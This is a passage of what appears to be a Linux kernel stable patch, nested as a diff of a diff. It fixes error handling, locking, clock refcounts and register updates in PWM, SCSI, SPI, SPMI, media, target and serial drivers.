+--- a/drivers/pwm/pwm-stm32.c
++++ b/drivers/pwm/pwm-stm32.c
+@@ -115,14 +115,14 @@ static int stm32_pwm_raw_capture(struct stm32_pwm *priv, struct pwm_device *pwm,
+ 	int ret;
+ 
+ 	/* Ensure registers have been updated, enable counter and capture */
+-	regmap_update_bits(priv->regmap, TIM_EGR, TIM_EGR_UG, TIM_EGR_UG);
+-	regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN, TIM_CR1_CEN);
++	regmap_set_bits(priv->regmap, TIM_EGR, TIM_EGR_UG);
++	regmap_set_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN);
+ 
+ 	/* Use cc1 or cc3 DMA resp for PWM input channels 1 & 2 or 3 & 4 */
+ 	dma_id = pwm->hwpwm < 2 ? STM32_TIMERS_DMA_CH1 : STM32_TIMERS_DMA_CH3;
+ 	ccen = pwm->hwpwm < 2 ? TIM_CCER_CC12E : TIM_CCER_CC34E;
+ 	ccr = pwm->hwpwm < 2 ? TIM_CCR1 : TIM_CCR3;
+-	regmap_update_bits(priv->regmap, TIM_CCER, ccen, ccen);
++	regmap_set_bits(priv->regmap, TIM_CCER, ccen);
+ 
+ 	/*
+ 	 * Timer DMA burst mode. Request 2 registers, 2 bursts, to get both
+@@ -160,8 +160,8 @@ static int stm32_pwm_raw_capture(struct stm32_pwm *priv, struct pwm_device *pwm,
+ 	}
+ 
+ stop:
+-	regmap_update_bits(priv->regmap, TIM_CCER, ccen, 0);
+-	regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN, 0);
++	regmap_clear_bits(priv->regmap, TIM_CCER, ccen);
++	regmap_clear_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN);
+ 
+ 	return ret;
+ }
+@@ -359,7 +359,7 @@ static int stm32_pwm_config(struct stm32_pwm *priv, int ch,
+ 
+ 	regmap_write(priv->regmap, TIM_PSC, prescaler);
+ 	regmap_write(priv->regmap, TIM_ARR, prd - 1);
+-	regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_ARPE, TIM_CR1_ARPE);
++	regmap_set_bits(priv->regmap, TIM_CR1, TIM_CR1_ARPE);
+ 
+ 	/* Calculate the duty cycles */
+ 	dty = prd * duty_ns;
+@@ -377,7 +377,7 @@ static int stm32_pwm_config(struct stm32_pwm *priv, int ch,
+ 	else
+ 		regmap_update_bits(priv->regmap, TIM_CCMR2, mask, ccmr);
+ 
+-	regmap_update_bits(priv->regmap, TIM_BDTR, TIM_BDTR_MOE, TIM_BDTR_MOE);
++	regmap_set_bits(priv->regmap, TIM_BDTR, TIM_BDTR_MOE);
+ 
+ 	return 0;
+ }
+@@ -411,13 +411,13 @@ static int stm32_pwm_enable(struct stm32_pwm *priv, int ch)
+ 	if (priv->have_complementary_output)
+ 		mask |= TIM_CCER_CC1NE << (ch * 4);
+ 
+-	regmap_update_bits(priv->regmap, TIM_CCER, mask, mask);
++	regmap_set_bits(priv->regmap, TIM_CCER, mask);
+ 
+ 	/* Make sure that registers are updated */
+-	regmap_update_bits(priv->regmap, TIM_EGR, TIM_EGR_UG, TIM_EGR_UG);
++	regmap_set_bits(priv->regmap, TIM_EGR, TIM_EGR_UG);
+ 
+ 	/* Enable controller */
+-	regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN, TIM_CR1_CEN);
++	regmap_set_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN);
+ 
+ 	return 0;
+ }
+@@ -431,11 +431,11 @@ static void stm32_pwm_disable(struct stm32_pwm *priv, int ch)
+ 	if (priv->have_complementary_output)
+ 		mask |= TIM_CCER_CC1NE << (ch * 4);
+ 
+-	regmap_update_bits(priv->regmap, TIM_CCER, mask, 0);
++	regmap_clear_bits(priv->regmap, TIM_CCER, mask);
+ 
+ 	/* When all channels are disabled, we can disable the controller */
+ 	if (!active_channels(priv))
+-		regmap_update_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN, 0);
++		regmap_clear_bits(priv->regmap, TIM_CR1, TIM_CR1_CEN);
+ 
+ 	clk_disable(priv->clk);
+ }
+@@ -568,41 +568,30 @@ static void stm32_pwm_detect_complementary(struct stm32_pwm *priv)
+ 	 * If complementary bit doesn't exist writing 1 will have no
+ 	 * effect so we can detect it.
+ 	 */
+-	regmap_update_bits(priv->regmap,
+-			   TIM_CCER, TIM_CCER_CC1NE, TIM_CCER_CC1NE);
++	regmap_set_bits(priv->regmap, TIM_CCER, TIM_CCER_CC1NE);
+ 	regmap_read(priv->regmap, TIM_CCER, &ccer);
+-	regmap_update_bits(priv->regmap, TIM_CCER, TIM_CCER_CC1NE, 0);
++	regmap_clear_bits(priv->regmap, TIM_CCER, TIM_CCER_CC1NE);
+ 
+ 	priv->have_complementary_output = (ccer != 0);
+ }
+ 
+-static int stm32_pwm_detect_channels(struct stm32_pwm *priv)
++static unsigned int stm32_pwm_detect_channels(struct stm32_pwm *priv,
++					      unsigned int *num_enabled)
+ {
+-	u32 ccer;
+-	int npwm = 0;
++	u32 ccer, ccer_backup;
+ 
+ 	/*
+ 	 * If channels enable bits don't exist writing 1 will have no
+ 	 * effect so we can detect and count them.
+ 	 */
+-	regmap_update_bits(priv->regmap,
+-			   TIM_CCER, TIM_CCER_CCXE, TIM_CCER_CCXE);
++	regmap_read(priv->regmap, TIM_CCER, &ccer_backup);
++	regmap_set_bits(priv->regmap, TIM_CCER, TIM_CCER_CCXE);
+ 	regmap_read(priv->regmap, TIM_CCER, &ccer);
+-	regmap_update_bits(priv->regmap, TIM_CCER, TIM_CCER_CCXE, 0);
+-
+-	if (ccer & TIM_CCER_CC1E)
+-		npwm++;
++	regmap_write(priv->regmap, TIM_CCER, ccer_backup);
+ 
+-	if (ccer & TIM_CCER_CC2E)
+-		npwm++;
++	*num_enabled = hweight32(ccer_backup & TIM_CCER_CCXE);
+ 
+-	if (ccer & TIM_CCER_CC3E)
+-		npwm++;
+-
+-	if (ccer & TIM_CCER_CC4E)
+-		npwm++;
+-
+-	return npwm;
++	return hweight32(ccer & TIM_CCER_CCXE);
+ }
+ 
+ static int stm32_pwm_probe(struct platform_device *pdev)
+@@ -611,6 +600,8 @@ static int stm32_pwm_probe(struct platform_device *pdev)
+ 	struct device_node *np = dev->of_node;
+ 	struct stm32_timers *ddata = dev_get_drvdata(pdev->dev.parent);
+ 	struct stm32_pwm *priv;
++	unsigned int num_enabled;
++	unsigned int i;
+ 	int ret;
+ 
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+@@ -633,7 +624,11 @@ static int stm32_pwm_probe(struct platform_device *pdev)
+ 
+ 	priv->chip.dev = dev;
+ 	priv->chip.ops = &stm32pwm_ops;
+-	priv->chip.npwm = stm32_pwm_detect_channels(priv);
++	priv->chip.npwm = stm32_pwm_detect_channels(priv, &num_enabled);
++
++	/* Initialize clock refcount to number of enabled PWM channels. */
++	for (i = 0; i < num_enabled; i++)
++		clk_enable(priv->clk);
+ 
+ 	ret = pwmchip_add(&priv->chip);
+ 	if (ret < 0)
+diff --git a/drivers/scsi/fnic/fnic_debugfs.c b/drivers/scsi/fnic/fnic_debugfs.c
+index 6fedc3b7d1ab2..eb895a65ea8fc 100644
+--- a/drivers/scsi/fnic/fnic_debugfs.c
++++ b/drivers/scsi/fnic/fnic_debugfs.c
+@@ -52,9 +52,10 @@ int fnic_debugfs_init(void)
+ 		fc_trc_flag->fnic_trace = 2;
+ 		fc_trc_flag->fc_trace = 3;
+ 		fc_trc_flag->fc_clear = 4;
++		return 0;
+ 	}
+ 
+-	return 0;
++	return -ENOMEM;
+ }
+ 
+ /*
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_main.c b/drivers/scsi/hisi_sas/hisi_sas_main.c
+index a8142e2b96435..450a8578157cb 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_main.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_main.c
+@@ -1502,12 +1502,12 @@ EXPORT_SYMBOL_GPL(hisi_sas_controller_reset_done);
+ static int hisi_sas_controller_prereset(struct hisi_hba *hisi_hba)
+ {
+ 	if (!hisi_hba->hw->soft_reset)
+-		return -1;
++		return -ENOENT;
+ 
+ 	down(&hisi_hba->sem);
+ 	if (test_and_set_bit(HISI_SAS_RESETTING_BIT, &hisi_hba->flags)) {
+ 		up(&hisi_hba->sem);
+-		return -1;
++		return -EPERM;
+ 	}
+ 
+ 	if (hisi_sas_debugfs_enable && hisi_hba->debugfs_itct[0].itct)
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index c4305ec38ebf3..0c80ff9affa39 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -3330,7 +3330,7 @@ static void debugfs_snapshot_global_reg_v3_hw(struct hisi_hba *hisi_hba)
+ 	u32 *databuf = hisi_hba->debugfs_regs[dump_index][DEBUGFS_GLOBAL].data;
+ 	int i;
+ 
+-	for (i = 0; i < debugfs_axi_reg.count; i++, databuf++)
++	for (i = 0; i < debugfs_global_reg.count; i++, databuf++)
+ 		*databuf = hisi_sas_read32(hisi_hba, 4 * i);
+ }
+ 
+@@ -4946,6 +4946,7 @@ static void hisi_sas_reset_done_v3_hw(struct pci_dev *pdev)
+ {
+ 	struct sas_ha_struct *sha = pci_get_drvdata(pdev);
+ 	struct hisi_hba *hisi_hba = sha->lldd_ha;
++	struct Scsi_Host *shost = hisi_hba->shost;
+ 	struct device *dev = hisi_hba->dev;
+ 	int rc;
+ 
+@@ -4954,6 +4955,10 @@ static void hisi_sas_reset_done_v3_hw(struct pci_dev *pdev)
+ 	rc = hw_init_v3_hw(hisi_hba);
+ 	if (rc) {
+ 		dev_err(dev, "FLR: hw init failed rc=%d\n", rc);
++		clear_bit(HISI_SAS_REJECT_CMD_BIT, &hisi_hba->flags);
++		scsi_unblock_requests(shost);
++		clear_bit(HISI_SAS_RESETTING_BIT, &hisi_hba->flags);
++		up(&hisi_hba->sem);
+ 		return;
+ 	}
+ 
+@@ -4981,7 +4986,7 @@ static int _suspend_v3_hw(struct device *device)
+ 	}
+ 
+ 	if (test_and_set_bit(HISI_SAS_RESETTING_BIT, &hisi_hba->flags))
+-		return -1;
++		return -EPERM;
+ 
+ 	dev_warn(dev, "entering suspend state\n");
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index d10c6afb7f9cd..8c662d08706f1 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -223,6 +223,22 @@ static long mpi3mr_bsg_pel_enable(struct mpi3mr_ioc *mrioc,
+ 		return rval;
+ 	}
+ 
++	if (mrioc->unrecoverable) {
++		dprint_bsg_err(mrioc, "%s: unrecoverable controller\n",
++			       __func__);
++		return -EFAULT;
++	}
++
++	if (mrioc->reset_in_progress) {
++		dprint_bsg_err(mrioc, "%s: reset in progress\n", __func__);
++		return -EAGAIN;
++	}
++
++	if (mrioc->stop_bsgs) {
++		dprint_bsg_err(mrioc, "%s: bsgs are blocked\n", __func__);
++		return -EAGAIN;
++	}
++
+ 	sg_copy_to_buffer(job->request_payload.sg_list,
+ 			  job->request_payload.sg_cnt,
+ 			  &pel_enable, sizeof(pel_enable));
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 6d55698ea4d16..85f5b349c7e43 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -1044,8 +1044,14 @@ void mpi3mr_rfresh_tgtdevs(struct mpi3mr_ioc *mrioc)
+ 	tgtdev = NULL;
+ 	list_for_each_entry(tgtdev, &mrioc->tgtdev_list, list) {
+ 		if ((tgtdev->dev_handle != MPI3MR_INVALID_DEV_HANDLE) &&
+-		    !tgtdev->is_hidden && !tgtdev->host_exposed)
+-			mpi3mr_report_tgtdev_to_host(mrioc, tgtdev->perst_id);
++		    !tgtdev->is_hidden) {
++			if (!tgtdev->host_exposed)
++				mpi3mr_report_tgtdev_to_host(mrioc,
++							     tgtdev->perst_id);
++			else if (tgtdev->starget)
++				starget_for_each_device(tgtdev->starget,
++							(void *)tgtdev, mpi3mr_update_sdev);
++	}
+ 	}
+ }
+ 
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index bc400669ee022..16a05143d0d62 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -680,14 +680,14 @@ static int _qcom_llcc_cfg_program(const struct llcc_slice_config *config,
+ 		u32 disable_cap_alloc, retain_pc;
+ 
+ 		disable_cap_alloc = config->dis_cap_alloc << config->slice_id;
+-		ret = regmap_write(drv_data->bcast_regmap,
+-				LLCC_TRP_SCID_DIS_CAP_ALLOC, disable_cap_alloc);
++		ret = regmap_update_bits(drv_data->bcast_regmap, LLCC_TRP_SCID_DIS_CAP_ALLOC,
++					 BIT(config->slice_id), disable_cap_alloc);
+ 		if (ret)
+ 			return ret;
+ 
+ 		retain_pc = config->retain_on_pc << config->slice_id;
+-		ret = regmap_write(drv_data->bcast_regmap,
+-				LLCC_TRP_PCB_ACT, retain_pc);
++		ret = regmap_update_bits(drv_data->bcast_regmap, LLCC_TRP_PCB_ACT,
++					 BIT(config->slice_id), retain_pc);
+ 		if (ret)
+ 			return ret;
+ 	}
+diff --git a/drivers/spi/Kconfig b/drivers/spi/Kconfig
+index 946e2186d2448..15ea11ebcbe09 100644
+--- a/drivers/spi/Kconfig
++++ b/drivers/spi/Kconfig
+@@ -1101,9 +1101,10 @@ config SPI_ZYNQ_QSPI
+ 
+ config SPI_ZYNQMP_GQSPI
+ 	tristate "Xilinx ZynqMP GQSPI controller"
+-	depends on (SPI_MASTER && HAS_DMA) || COMPILE_TEST
++	depends on (SPI_MEM && HAS_DMA) || COMPILE_TEST
+ 	help
+ 	  Enables Xilinx GQSPI controller driver for Zynq UltraScale+ MPSoC.
++	  This controller only supports SPI memory interface.
+ 
+ config SPI_AMD
+ 	tristate "AMD SPI controller"
+diff --git a/drivers/spi/spi-sh-msiof.c b/drivers/spi/spi-sh-msiof.c
+index 9bca3d076f053..51ceaa4857249 100644
+--- a/drivers/spi/spi-sh-msiof.c
++++ b/drivers/spi/spi-sh-msiof.c
+@@ -30,12 +30,15 @@
+ 
+ #include <asm/unaligned.h>
+ 
++#define SH_MSIOF_FLAG_FIXED_DTDL_200	BIT(0)
++
+ struct sh_msiof_chipdata {
+ 	u32 bits_per_word_mask;
+ 	u16 tx_fifo_size;
+ 	u16 rx_fifo_size;
+ 	u16 ctlr_flags;
+ 	u16 min_div_pow;
++	u32 flags;
+ };
+ 
+ struct sh_msiof_spi_priv {
+@@ -1073,6 +1076,16 @@ static const struct sh_msiof_chipdata rcar_gen3_data = {
+ 	.min_div_pow = 1,
+ };
+ 
++static const struct sh_msiof_chipdata rcar_r8a7795_data = {
++	.bits_per_word_mask = SPI_BPW_MASK(8) | SPI_BPW_MASK(16) |
++			      SPI_BPW_MASK(24) | SPI_BPW_MASK(32),
++	.tx_fifo_size = 64,
++	.rx_fifo_size = 64,
++	.ctlr_flags = SPI_CONTROLLER_MUST_TX,
++	.min_div_pow = 1,
++	.flags = SH_MSIOF_FLAG_FIXED_DTDL_200,
++};
++
+ static const struct of_device_id sh_msiof_match[] = {
+ 	{ .compatible = "renesas,sh-mobile-msiof", .data = &sh_data },
+ 	{ .compatible = "renesas,msiof-r8a7743",   .data = &rcar_gen2_data },
+@@ -1083,6 +1096,7 @@ static const struct of_device_id sh_msiof_match[] = {
+ 	{ .compatible = "renesas,msiof-r8a7793",   .data = &rcar_gen2_data },
+ 	{ .compatible = "renesas,msiof-r8a7794",   .data = &rcar_gen2_data },
+ 	{ .compatible = "renesas,rcar-gen2-msiof", .data = &rcar_gen2_data },
++	{ .compatible = "renesas,msiof-r8a7795",   .data = &rcar_r8a7795_data },
+ 	{ .compatible = "renesas,msiof-r8a7796",   .data = &rcar_gen3_data },
+ 	{ .compatible = "renesas,rcar-gen3-msiof", .data = &rcar_gen3_data },
+ 	{ .compatible = "renesas,rcar-gen4-msiof", .data = &rcar_gen3_data },
+@@ -1280,6 +1294,9 @@ static int sh_msiof_spi_probe(struct platform_device *pdev)
+ 		return -ENXIO;
+ 	}
+ 
++	if (chipdata->flags & SH_MSIOF_FLAG_FIXED_DTDL_200)
++		info->dtdl = 200;
++
+ 	if (info->mode == MSIOF_SPI_SLAVE)
+ 		ctlr = spi_alloc_slave(&pdev->dev,
+ 				       sizeof(struct sh_msiof_spi_priv));
+diff --git a/drivers/spmi/spmi-mtk-pmif.c b/drivers/spmi/spmi-mtk-pmif.c
+index ad511f2c3324e..01e8851e639d5 100644
+--- a/drivers/spmi/spmi-mtk-pmif.c
++++ b/drivers/spmi/spmi-mtk-pmif.c
+@@ -50,6 +50,7 @@ struct pmif {
+ 	struct clk_bulk_data clks[PMIF_MAX_CLKS];
+ 	size_t nclks;
+ 	const struct pmif_data *data;
++	raw_spinlock_t lock;
+ };
+ 
+ static const char * const pmif_clock_names[] = {
+@@ -314,6 +315,7 @@ static int pmif_spmi_read_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	struct ch_reg *inf_reg;
+ 	int ret;
+ 	u32 data, cmd;
++	unsigned long flags;
+ 
+ 	/* Check for argument validation. */
+ 	if (sid & ~0xf) {
+@@ -334,6 +336,7 @@ static int pmif_spmi_read_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	else
+ 		return -EINVAL;
+ 
++	raw_spin_lock_irqsave(&arb->lock, flags);
+ 	/* Wait for Software Interface FSM state to be IDLE. */
+ 	inf_reg = &arb->chan;
+ 	ret = readl_poll_timeout_atomic(arb->base + arb->data->regs[inf_reg->ch_sta],
+@@ -343,6 +346,7 @@ static int pmif_spmi_read_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 		/* set channel ready if the data has transferred */
+ 		if (pmif_is_fsm_vldclr(arb))
+ 			pmif_writel(arb, 1, inf_reg->ch_rdy);
++		raw_spin_unlock_irqrestore(&arb->lock, flags);
+ 		dev_err(&ctrl->dev, "failed to wait for SWINF_IDLE\n");
+ 		return ret;
+ 	}
+@@ -350,6 +354,7 @@ static int pmif_spmi_read_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	/* Send the command. */
+ 	cmd = (opc << 30) | (sid << 24) | ((len - 1) << 16) | addr;
+ 	pmif_writel(arb, cmd, inf_reg->ch_send);
++	raw_spin_unlock_irqrestore(&arb->lock, flags);
+ 
+ 	/*
+ 	 * Wait for Software Interface FSM state to be WFVLDCLR,
+@@ -376,7 +381,8 @@ static int pmif_spmi_write_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	struct pmif *arb = spmi_controller_get_drvdata(ctrl);
+ 	struct ch_reg *inf_reg;
+ 	int ret;
+-	u32 data, cmd;
++	u32 data, wdata, cmd;
++	unsigned long flags;
+ 
+ 	if (len > 4) {
+ 		dev_err(&ctrl->dev, "pmif supports 1..4 bytes per trans, but:%zu requested", len);
+@@ -394,6 +400,10 @@ static int pmif_spmi_write_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 	else
+ 		return -EINVAL;
+ 
++	/* Set the write data. */
++	memcpy(&wdata, buf, len);
++
++	raw_spin_lock_irqsave(&arb->lock, flags);
+ 	/* Wait for Software Interface FSM state to be IDLE. */
+ 	inf_reg = &arb->chan;
+ 	ret = readl_poll_timeout_atomic(arb->base + arb->data->regs[inf_reg->ch_sta],
+@@ -403,17 +413,17 @@ static int pmif_spmi_write_cmd(struct spmi_controller *ctrl, u8 opc, u8 sid,
+ 		/* set channel ready if the data has transferred */
+ 		if (pmif_is_fsm_vldclr(arb))
+ 			pmif_writel(arb, 1, inf_reg->ch_rdy);
++		raw_spin_unlock_irqrestore(&arb->lock, flags);
+ 		dev_err(&ctrl->dev, "failed to wait for SWINF_IDLE\n");
+ 		return ret;
+ 	}
+ 
+-	/* Set the write data. */
+-	memcpy(&data, buf, len);
+-	pmif_writel(arb, data, inf_reg->wdata);
++	pmif_writel(arb, wdata, inf_reg->wdata);
+ 
+ 	/* Send the command. */
+ 	cmd = (opc << 30) | BIT(29) | (sid << 24) | ((len - 1) << 16) | addr;
+ 	pmif_writel(arb, cmd, inf_reg->ch_send);
++	raw_spin_unlock_irqrestore(&arb->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -488,6 +498,8 @@ static int mtk_spmi_probe(struct platform_device *pdev)
+ 	arb->chan.ch_send = PMIF_SWINF_0_ACC + chan_offset;
+ 	arb->chan.ch_rdy = PMIF_SWINF_0_VLD_CLR + chan_offset;
+ 
++	raw_spin_lock_init(&arb->lock);
++
+ 	platform_set_drvdata(pdev, ctrl);
+ 
+ 	err = spmi_controller_add(ctrl);
+diff --git a/drivers/staging/media/rkvdec/rkvdec.c b/drivers/staging/media/rkvdec/rkvdec.c
+index a9bd1e71ea487..d16cf4115d03a 100644
+--- a/drivers/staging/media/rkvdec/rkvdec.c
++++ b/drivers/staging/media/rkvdec/rkvdec.c
+@@ -461,6 +461,9 @@ static const struct v4l2_ioctl_ops rkvdec_ioctl_ops = {
+ 
+ 	.vidioc_streamon = v4l2_m2m_ioctl_streamon,
+ 	.vidioc_streamoff = v4l2_m2m_ioctl_streamoff,
++
++	.vidioc_decoder_cmd = v4l2_m2m_ioctl_stateless_decoder_cmd,
++	.vidioc_try_decoder_cmd = v4l2_m2m_ioctl_stateless_try_decoder_cmd,
+ };
+ 
+ static int rkvdec_queue_setup(struct vb2_queue *vq, unsigned int *num_buffers,
+diff --git a/drivers/target/target_core_file.c b/drivers/target/target_core_file.c
+index 7e81a53dbf3ca..8d74e97c98748 100644
+--- a/drivers/target/target_core_file.c
++++ b/drivers/target/target_core_file.c
+@@ -338,11 +338,13 @@ static int fd_do_rw(struct se_cmd *cmd, struct file *fd,
+ 	}
+ 
+ 	iov_iter_bvec(&iter, is_write, bvec, sgl_nents, len);
+-	if (is_write)
++	if (is_write) {
++		file_start_write(fd);
+ 		ret = vfs_iter_write(fd, &iter, &pos, 0);
+-	else
++		file_end_write(fd);
++	} else {
+ 		ret = vfs_iter_read(fd, &iter, &pos, 0);
+-
++	}
+ 	if (is_write) {
+ 		if (ret < 0 || ret != data_length) {
+ 			pr_err("%s() write returned %d\n", __func__, ret);
+@@ -474,7 +476,9 @@ fd_execute_write_same(struct se_cmd *cmd)
+ 	}
+ 
+ 	iov_iter_bvec(&iter, ITER_SOURCE, bvec, nolb, len);
++	file_start_write(fd_dev->fd_file);
+ 	ret = vfs_iter_write(fd_dev->fd_file, &iter, &pos, 0);
++	file_end_write(fd_dev->fd_file);
+ 
+ 	kfree(bvec);
+ 	if (ret < 0 || ret != len) {
+diff --git a/drivers/tty/serial/8250/8250_bcm2835aux.c b/drivers/tty/serial/8250/8250_bcm2835aux.c
+index 15a2387a5b258..4f4502fb5454c 100644
+--- a/drivers/tty/serial/8250/8250_bcm2835aux.c
++++ b/drivers/tty/serial/8250/8250_bcm2835aux.c
+@@ -119,6 +119,8 @@ static int bcm2835aux_serial_probe(struct platform_device *pdev)
+ 
+ 	/* get the clock - this also enables the HW */
+ 	data->clk = devm_clk_get_optional(&pdev->dev, NULL);
++	if (IS_ERR(data->clk))
++		return dev_err_probe(&pdev->dev, PTR_ERR(data->clk), "could not get clk\n");
+ 
+ 	/* get the interrupt */
+ 	ret = platform_get_irq(pdev, 0);
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index b406cba10b0eb..dca1abe363248 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -442,7 +442,7 @@ static int generic_rs485_config(struct uart_port *port, struct ktermios *termios
+ }
+ 
+ static const struct serial_rs485 generic_rs485_supported = {
+-	.flags = SER_RS485_ENABLED,
++	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND,
+ };
+ 
+ static const struct exar8250_platform exar8250_default_platform = {
+@@ -486,7 +486,8 @@ static int iot2040_rs485_config(struct uart_port *port, struct ktermios *termios
+ }
+ 
+ static const struct serial_rs485 iot2040_rs485_supported = {
+-	.flags = SER_RS485_ENABLED | SER_RS485_RX_DURING_TX | SER_RS485_TERMINATE_BUS,
++	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND |
++		 SER_RS485_RX_DURING_TX | SER_RS485_TERMINATE_BUS,
+ };
+ 
+ static const struct property_entry iot2040_gpio_properties[] = {
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index 0b04d810b3e61..037d613006f56 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -1476,7 +1476,7 @@ static int omap8250_remove(struct platform_device *pdev)
+ 
+ 	err = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (err)
+-		return err;
++		dev_err(&pdev->dev, "Failed to resume hardware\n");
+ 
+ 	serial8250_unregister_port(priv->line);
+ 	priv->line = -ENODEV;
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index d2137f6eff327..f8962a3d44216 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -450,13 +450,13 @@ static void imx_uart_stop_tx(struct uart_port *port)
+ 	ucr1 = imx_uart_readl(sport, UCR1);
+ 	imx_uart_writel(sport, ucr1 & ~UCR1_TRDYEN, UCR1);
+ 
++	ucr4 = imx_uart_readl(sport, UCR4);
+ 	usr2 = imx_uart_readl(sport, USR2);
+-	if (!(usr2 & USR2_TXDC)) {
++	if ((!(usr2 & USR2_TXDC)) && (ucr4 & UCR4_TCEN)) {
+ 		/* The shifter is still busy, so retry once TC triggers */
+ 		return;
+ 	}
+ 
+-	ucr4 = imx_uart_readl(sport, UCR4);
+ 	ucr4 &= ~UCR4_TCEN;
+ 	imx_uart_writel(sport, ucr4, UCR4);
+ 
+@@ -2229,7 +2229,6 @@ static enum hrtimer_restart imx_trigger_stop_tx(struct hrtimer *t)
+ 	return HRTIMER_NORESTART;
+ }
+ 
+-static const struct serial_rs485 imx_no_rs485 = {};	/* No RS485 if no RTS */
+ static const struct serial_rs485 imx_rs485_supported = {
+ 	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND | SER_RS485_RTS_AFTER_SEND |
+ 		 SER_RS485_RX_DURING_TX,
+@@ -2319,8 +2318,6 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	/* RTS is required to control the RS485 transmitter */
+ 	if (sport->have_rtscts || sport->have_rtsgpio)
+ 		sport->port.rs485_supported = imx_rs485_supported;
+-	else
+-		sport->port.rs485_supported = imx_no_rs485;
+ 	sport->port.flags = UPF_BOOT_AUTOCONF;
+ 	timer_setup(&sport->timer, imx_uart_timeout, 0);
+ 
+@@ -2347,7 +2344,7 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	/* For register access, we only need to enable the ipg clock. */
+ 	ret = clk_prepare_enable(sport->clk_ipg);
+ 	if (ret) {
+-		dev_err(&pdev->dev, "failed to enable per clk: %d\n", ret);
++		dev_err(&pdev->dev, "failed to enable ipg clk: %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -2359,14 +2356,8 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	sport->ufcr = readl(sport->port.membase + UFCR);
+ 
+ 	ret = uart_get_rs485_mode(&sport->port);
+-	if (ret) {
+-		clk_disable_unprepare(sport->clk_ipg);
+-		return ret;
+-	}
+-
+-	if (sport->port.rs485.flags & SER_RS485_ENABLED &&
+-	    (!sport->have_rtscts && !sport->have_rtsgpio))
+-		dev_err(&pdev->dev, "no RTS control, disabling rs485\n");
++	if (ret)
++		goto err_clk;
+ 
+ 	/*
+ 	 * If using the i.MX UART RTS/CTS control then the RTS (CTS_B)
+@@ -2446,8 +2437,6 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 		imx_uart_writel(sport, ucr3, UCR3);
+ 	}
+ 
+-	clk_disable_unprepare(sport->clk_ipg);
+-
+ 	hrtimer_init(&sport->trigger_start_tx, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
+ 	hrtimer_init(&sport->trigger_stop_tx, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
+ 	sport->trigger_start_tx.function = imx_trigger_start_tx;
+@@ -2463,7 +2452,7 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 		if (ret) {
+ 			dev_err(&pdev->dev, "failed to request rx irq: %d\n",
+ 				ret);
+-			return ret;
++			goto err_clk;
+ 		}
+ 
+ 		ret = devm_request_irq(&pdev->dev, txirq, imx_uart_txint, 0,
+@@ -2471,7 +2460,7 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 		if (ret) {
+ 			dev_err(&pdev->dev, "failed to request tx irq: %d\n",
+ 				ret);
+-			return ret;
++			goto err_clk;
+ 		}
+ 
+ 		ret = devm_request_irq(&pdev->dev, rtsirq, imx_uart_rtsint, 0,
+@@ -2479,14 +2468,14 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 		if (ret) {
+ 			dev_err(&pdev->dev, "failed to request rts irq: %d\n",
+ 				ret);
+-			return ret;
++			goto err_clk;
+ 		}
+ 	} else {
+ 		ret = devm_request_irq(&pdev->dev, rxirq, imx_uart_int, 0,
+ 				       dev_name(&pdev->dev), sport);
+ 		if (ret) {
